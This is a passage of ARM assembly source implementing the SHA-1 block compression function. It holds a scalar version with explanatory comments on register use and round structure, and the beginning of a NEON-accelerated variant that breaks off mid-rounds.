@ Working state lives in r3..r7 (A..E); r8 = current round constant K;
@ r9..r12 = scratch; r14 marks the top of the 16-word circular
@ message-schedule window that is grown downward on the stack.
@ Note: B..D are kept pre-rotated (see the initial ror#30 and the
@ per-round ror#2 compensation), which saves an explicit rotate in the
@ round body.
@ Rounds 20-39 and 60-79 share .L_20_39_or_60_79; they are told apart
@ by the carry flag (cleared via "cmn sp,#0" before 20-39, set via
@ "cmp sp,#0" before 60-79, tested with bcs at loop exit).
@-----------------------------------------------------------------------
.globl cryptogams_sha1_block_data_order
.type cryptogams_sha1_block_data_order,%function
cryptogams_sha1_block_data_order:
.Lcryptogams_sha1_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha1_block_data_order
#else
adr r3,.Lcryptogams_sha1_block_data_order
#endif
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
ldmia r0,{r3,r4,r5,r6,r7}
.Lloop:
ldr r8,.LK_00_19
mov r14,sp
sub sp,sp,#15*4
mov r5,r5,ror#30
mov r6,r6,ror#30
mov r7,r7,ror#30 @ [6]
@ Rounds 0..15: fetch big-endian message words (assembled byte-by-byte
@ on pre-ARMv7 cores, which cannot do unaligned word loads) and push
@ each onto the schedule window at [r14,#-4]! for later expansion.
.L_00_15:
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r6,r8,r6,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r4,r5 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r6,r8,r6,ror#2 @ E+=K_00_19
eor r10,r4,r5 @ F_xx_xx
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r3,r10,ror#2
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r6,r6,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r5,r8,r5,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r3,r4 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r5,r8,r5,ror#2 @ E+=K_00_19
eor r10,r3,r4 @ F_xx_xx
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r7,r10,ror#2
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r5,r5,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r4,r8,r4,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r7,r3 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r4,r8,r4,ror#2 @ E+=K_00_19
eor r10,r7,r3 @ F_xx_xx
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r6,r10,ror#2
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r4,r4,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r3,r8,r3,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r6,r7 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r3,r8,r3,ror#2 @ E+=K_00_19
eor r10,r6,r7 @ F_xx_xx
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r5,r10,ror#2
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r3,r3,r10 @ E+=F_00_19(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_00_15 @ [((11+4)*5+2)*3]
sub sp,sp,#25*4
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
@ Rounds 16..19: first expanded words — X[i] is built from
@ X[i-3]^X[i-8]^X[i-14]^X[i-16] rotated left by 1, still with the
@ F_00_19 choice function.
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
add r6,r6,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
add r5,r5,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
add r4,r4,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
add r3,r3,r10 @ E+=F_00_19(B,C,D)
ldr r8,.LK_20_39 @ [+15+16*4]
cmn sp,#0 @ [+3], clear carry to denote 20_39
@ Shared loop for rounds 20..39 (carry clear) and 60..79 (carry set):
@ F = B^C^D (parity).  The carry flag survives the loop body and is
@ tested at .L_done dispatch below.
.L_20_39_or_60_79:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r4,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_20_39(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp @ preserve carry
#endif
bne .L_20_39_or_60_79 @ [+((12+3)*5+2)*4]
bcs .L_done @ [+((12+3)*5+2)*4], spare 300 bytes
ldr r8,.LK_40_59
sub sp,sp,#20*4 @ [+2]
@ Rounds 40..59: majority function, computed in two additive terms:
@ (B & (C^D)) handled like the choice form, plus (C & D) added
@ separately (the r11 term).
.L_40_59:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r4,r10,ror#2 @ F_xx_xx
and r11,r5,r6 @ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_40_59(B,C,D)
add r7,r7,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
and r11,r4,r5 @ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_40_59(B,C,D)
add r6,r6,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
and r11,r3,r4 @ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_40_59(B,C,D)
add r5,r5,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
and r11,r7,r3 @ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_40_59(B,C,D)
add r4,r4,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
and r11,r6,r7 @ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_40_59(B,C,D)
add r3,r3,r11,ror#2
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_40_59 @ [+((12+5)*5+2)*4]
ldr r8,.LK_60_79
sub sp,sp,#20*4
cmp sp,#0 @ set carry to denote 60_79
b .L_20_39_or_60_79 @ [+4], spare 300 bytes
@ All 80 rounds done: tear down the schedule frame and fold the
@ working state back into the context (un-rotating B..D by ror#2).
.L_done:
add sp,sp,#80*4 @ "deallocate" stack frame
ldmia r0,{r8,r9,r10,r11,r12}
add r3,r8,r3
add r4,r9,r4
add r5,r10,r5,ror#2
add r6,r11,r6,ror#2
add r7,r12,r7,ror#2
stmia r0,{r3,r4,r5,r6,r7}
teq r1,r2
bne .Lloop @ [+18], total 1307
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha1_block_data_order,.-cryptogams_sha1_block_data_order
@ SHA-1 round constants, one per 20-round stage.
.align 5
.LK_00_19:.word 0x5a827999
.LK_20_39:.word 0x6ed9eba1
.LK_40_59:.word 0x8f1bbcdc
.LK_60_79:.word 0xca62c1d6
.align 5
@-----------------------------------------------------------------------
@ void cryptogams_sha1_block_data_order_neon(u32 ctx[5], const u8 *inp,
@                                            size_t nblocks)
@ NEON-assisted SHA-1 compression: scalar ALU rounds interleaved with
@ NEON message-schedule computation for the NEXT four W-words.
@ In:   r0 = ctx (five 32-bit state words a..e), r1 = input,
@       r2 = number of 64-byte blocks (converted to end pointer below).
@ Uses: r3..r7 = working state a..e; r8 walks the .LK_* constant table;
@       q14 (d28/d29) = current K broadcast; q15 = zero; q0..q3 = W[0..15].
@ Stack: 64-byte, 16-aligned scratch ring holding four W+K vectors;
@       original sp kept in r14 and restored on the last iteration.
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl cryptogams_sha1_block_data_order_neon
.type cryptogams_sha1_block_data_order_neon,%function
.align 4
cryptogams_sha1_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
@ dmb @ errata #451034 on early Cortex A8
@ vstmdb sp!,{d8-d15} @ ABI specification says so
mov r14,sp
sub r12,sp,#64
adr r8,.LK_00_19
bic r12,r12,#15 @ align for 128-bit stores
ldmia r0,{r3,r4,r5,r6,r7} @ load context
mov sp,r12 @ alloca
@ Load the first block, byte-swap it, and precompute W[0..11]+K_00_19
@ into the aligned scratch area before entering the main loop.
vld1.8 {q0,q1},[r1]! @ handles unaligned
veor q15,q15,q15
vld1.8 {q2,q3},[r1]!
vld1.32 {d28[],d29[]},[r8,:32]! @ load K_00_19
vrev32.8 q0,q0 @ yes, even on
vrev32.8 q1,q1 @ big-endian...
vrev32.8 q2,q2
vadd.i32 q8,q0,q14
vrev32.8 q3,q3
vadd.i32 q9,q1,q14
vst1.32 {q8},[r12,:128]!
vadd.i32 q10,q2,q14
vst1.32 {q9},[r12,:128]!
vst1.32 {q10},[r12,:128]!
ldr r9,[sp] @ big RAW stall
@ Main per-block loop.  Rounds 0..15 use F_00_19 = Ch(b,c,d), computed
@ branchlessly as (c&b)^(d&~b) via the and/bic/eor triples on r10/r11.
@ r9 is always the next W[i]+K word read from the stack ring ([sp,#..]);
@ the interleaved NEON ops compute W[16..31] four lanes at a time
@ (vext/veor gather W[i-16..i-3], vsri/vshl/vshr apply the rotates) and
@ store W+K for rounds 16+ back into the ring via vst1.32.
.Loop_neon:
vext.8 q8,q0,q1,#8
bic r10,r6,r4
add r7,r7,r9
and r11,r5,r4
vadd.i32 q13,q3,q14
ldr r9,[sp,#4]
add r7,r7,r3,ror#27
vext.8 q12,q3,q15,#4
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
veor q8,q8,q0
bic r10,r5,r3
add r6,r6,r9
veor q12,q12,q2
and r11,r4,r3
ldr r9,[sp,#8]
veor q12,q12,q8
add r6,r6,r7,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q13,q15,q12,#4
bic r10,r4,r7
add r5,r5,r9
vadd.i32 q8,q12,q12
and r11,r3,r7
ldr r9,[sp,#12]
vsri.32 q8,q12,#31
add r5,r5,r6,ror#27
eor r11,r11,r10
mov r7,r7,ror#2
vshr.u32 q12,q13,#30
add r5,r5,r11
bic r10,r3,r6
vshl.u32 q13,q13,#2
add r4,r4,r9
and r11,r7,r6
veor q8,q8,q12
ldr r9,[sp,#16]
add r4,r4,r5,ror#27
veor q8,q8,q13
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q9,q1,q2,#8
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
vadd.i32 q13,q8,q14
ldr r9,[sp,#20]
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r4,ror#27
vext.8 q12,q8,q15,#4
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
veor q9,q9,q1
bic r10,r6,r4
add r7,r7,r9
veor q12,q12,q3
and r11,r5,r4
ldr r9,[sp,#24]
veor q12,q12,q9
add r7,r7,r3,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q13,q15,q12,#4
bic r10,r5,r3
add r6,r6,r9
vadd.i32 q9,q12,q12
and r11,r4,r3
ldr r9,[sp,#28]
vsri.32 q9,q12,#31
add r6,r6,r7,ror#27
eor r11,r11,r10
mov r3,r3,ror#2
vshr.u32 q12,q13,#30
add r6,r6,r11
bic r10,r4,r7
vshl.u32 q13,q13,#2
add r5,r5,r9
and r11,r3,r7
veor q9,q9,q12
ldr r9,[sp,#32]
add r5,r5,r6,ror#27
veor q9,q9,q13
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q10,q2,q3,#8
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
vadd.i32 q13,q9,q14
ldr r9,[sp,#36]
add r4,r4,r5,ror#27
vext.8 q12,q9,q15,#4
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
veor q10,q10,q2
bic r10,r7,r5
add r3,r3,r9
veor q12,q12,q8
and r11,r6,r5
ldr r9,[sp,#40]
veor q12,q12,q10
add r3,r3,r4,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q13,q15,q12,#4
bic r10,r6,r4
add r7,r7,r9
vadd.i32 q10,q12,q12
and r11,r5,r4
ldr r9,[sp,#44]
vsri.32 q10,q12,#31
add r7,r7,r3,ror#27
eor r11,r11,r10
mov r4,r4,ror#2
vshr.u32 q12,q13,#30
add r7,r7,r11
bic r10,r5,r3
vshl.u32 q13,q13,#2
add r6,r6,r9
and r11,r4,r3
veor q10,q10,q12
ldr r9,[sp,#48]
add r6,r6,r7,ror#27
veor q10,q10,q13
eor r11,r11,r10
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q11,q3,q8,#8
bic r10,r4,r7
add r5,r5,r9
and r11,r3,r7
vadd.i32 q13,q10,q14
ldr r9,[sp,#52]
add r5,r5,r6,ror#27
vext.8 q12,q10,q15,#4
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
veor q11,q11,q3
bic r10,r3,r6
add r4,r4,r9
veor q12,q12,q9
and r11,r7,r6
ldr r9,[sp,#56]
veor q12,q12,q11
add r4,r4,r5,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q13,q15,q12,#4
bic r10,r7,r5
add r3,r3,r9
vadd.i32 q11,q12,q12
and r11,r6,r5
ldr r9,[sp,#60]
vsri.32 q11,q12,#31
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
vshr.u32 q12,q13,#30
add r3,r3,r11
bic r10,r6,r4
vshl.u32 q13,q13,#2
add r7,r7,r9
and r11,r5,r4
veor q11,q11,q12
ldr r9,[sp,#0]
add r7,r7,r3,ror#27
veor q11,q11,q13
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
@ Rounds 16..39: the scalar F switches to F_20_39 = b^c^d (eor/eor
@ pairs on r10/r11) after the remaining bic/and Ch rounds; the NEON
@ schedule switches to the simpler W[i] = (W[i-32..]^..)<<<2 form
@ (veor + vshr/vsli by 30/2) once 32 W-words exist.  q14 is reloaded
@ with K_20_39 from [r8] along the way; W+K keeps streaming to [r12].
vext.8 q12,q10,q11,#8
bic r10,r5,r3
add r6,r6,r9
and r11,r4,r3
veor q0,q0,q8
ldr r9,[sp,#4]
add r6,r6,r7,ror#27
veor q0,q0,q1
eor r11,r11,r10
mov r3,r3,ror#2
vadd.i32 q13,q11,q14
add r6,r6,r11
bic r10,r4,r7
veor q12,q12,q0
add r5,r5,r9
and r11,r3,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r11,r10
mov r7,r7,ror#2
vsli.32 q0,q12,#2
add r5,r5,r11
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
ldr r9,[sp,#12]
add r4,r4,r5,ror#27
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
ldr r9,[sp,#16]
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q11,q0,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#20]
veor q1,q1,q9
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q1,q1,q2
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q0,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q1
ldr r9,[sp,#24]
eor r11,r10,r4
vshr.u32 q1,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q1,q12,#2
add r5,r5,r9
ldr r9,[sp,#28]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#32]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q0,q1,#8
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#36]
veor q2,q2,q10
eor r11,r10,r6
add r3,r3,r4,ror#27
veor q2,q2,q3
mov r5,r5,ror#2
add r3,r3,r11
vadd.i32 q13,q1,q14
eor r10,r4,r6
vld1.32 {d28[],d29[]},[r8,:32]!
add r7,r7,r9
veor q12,q12,q2
ldr r9,[sp,#40]
eor r11,r10,r5
vshr.u32 q2,q12,#30
add r7,r7,r3,ror#27
mov r4,r4,ror#2
vst1.32 {q13},[r12,:128]!
add r7,r7,r11
eor r10,r3,r5
vsli.32 q2,q12,#2
add r6,r6,r9
ldr r9,[sp,#44]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#48]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q1,q2,#8
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r7
add r4,r4,r5,ror#27
veor q3,q3,q8
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q2,q14
eor r10,r5,r7
add r3,r3,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r6
vshr.u32 q3,q12,#30
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vst1.32 {q13},[r12,:128]!
add r3,r3,r11
eor r10,r4,r6
vsli.32 q3,q12,#2
add r7,r7,r9
ldr r9,[sp,#60]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#0]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q2,q3,#8
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#4]
veor q8,q8,q0
eor r11,r10,r3
add r5,r5,r6,ror#27
veor q8,q8,q9
mov r7,r7,ror#2
add r5,r5,r11
vadd.i32 q13,q3,q14
eor r10,r6,r3
add r4,r4,r9
veor q12,q12,q8
ldr r9,[sp,#8]
eor r11,r10,r7
vshr.u32 q8,q12,#30
add r4,r4,r5,ror#27
mov r6,r6,ror#2
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
add r4,r4,r11
eor r10,r5,r7
vsli.32 q8,q12,#2
add r3,r3,r9
ldr r9,[sp,#12]
